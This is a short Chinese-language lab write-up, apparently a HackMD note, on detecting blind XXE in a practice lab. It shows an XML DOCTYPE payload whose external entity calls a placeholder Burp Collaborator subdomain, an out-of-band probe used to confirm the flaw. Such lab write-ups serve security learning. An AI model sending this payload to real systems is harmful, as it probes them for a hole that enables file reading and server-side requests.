# XXE Lab3 這題 Blind XXE(盲注XXE),因為後端不直接回顯結果,我們只能用「外部互動」來判斷 XXE 是否成功觸發。 一樣進入網站並攔截請求。   接著修改請求,填入我們的子網域。 ``` <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-BURP-COLLABORATOR-SUBDOMAIN"> ]> ```  這表示 XXE 成功觸發,後端嘗試從你控制的 Collaborator 伺服器讀資源。  ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up